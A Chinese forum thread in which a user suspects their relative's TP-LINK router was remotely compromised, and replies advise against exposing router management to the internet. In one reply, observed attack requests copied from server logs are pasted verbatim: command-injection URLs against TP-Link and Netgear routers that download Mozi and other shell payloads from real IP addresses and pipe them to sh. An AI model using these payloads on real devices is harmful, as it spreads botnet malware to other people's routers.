路由器是 TP-LINK,路由器密码也不是我以前记的那个了。
1 anson264556364 7 天前 然后呢? |
![]() | 2 programApe OP @anson264556364 密码和以前设置的不一样了,等晚上亲戚回去把设备重置下看看,感觉可能是 tp-link 远程管理有漏洞。 |
3 allplay 7 天前 via Android tp link 远程管理?你从 wan 口进入? 这是找死,迟早的事 |
4 allplay 7 天前 via Android 应该 vpn 或者内网穿透,然后 lan 设备去管理它 |
5 shum02 7 天前 以前遇到过家里的 padavan 被恶意改了 DNS ,公网进去改的应该是。 |
6 xyz3210 7 天前 我是桥接的! |
8 2397613259qqq 7 天前 从外回家管理路由最佳实践是 vpn ,或者 ssh tunnel ,不要直接暴露管理入口在公网上,路由器这种东西没有及时更新很容易被滥用 |
9 dpx 7 天前 服务器经常会收到一些利用漏洞攻击路由器的请求如 /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(wget%20http%3A//144.172.103.95/router.tplink.sh%20-O-%7Csh) /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://49.130.26.13:39255/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/¤tsetting.htm=1 /cgi-bin/shortcut_telnet.cgi?wget%20-qO-%20http%3A%2F%2F74.194.191.52%2Frondo.wyu.sh%7Csh%26 /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=busybox%20wget%20-qO-%20http%3A%2F%2F74.194.191.52%2Frondo.ush.sh%7Csh%26&curpath=%2F¤tsetting.htm=1 /cgi-bin/account_mgr.cgi?cmd=cgi_user_add&name=%27%3Bwget%20-qO-%20http%3A%2F%2F74.194.191.52%2Frondo.djc.sh%7Csh%3B%27 |
![]() | 11 titanium98118 6 天前 via Android 80 端口能通吗? |
![]() | 12 programApe OP @titanium98118 不通,老家的网,没弄公网 ip 、没 ipv6 、没桥接。可能的原因是 tp-link 的那个物联 app 管理,或者是装宽带的小哥干的?目前也只有这两种可能性了。 |
16 aru 3 天前 似乎某些路由器固件有漏洞 当你访问恶意网站的时候会被上面的脚本发起内网 http 请求修改路由器配置 |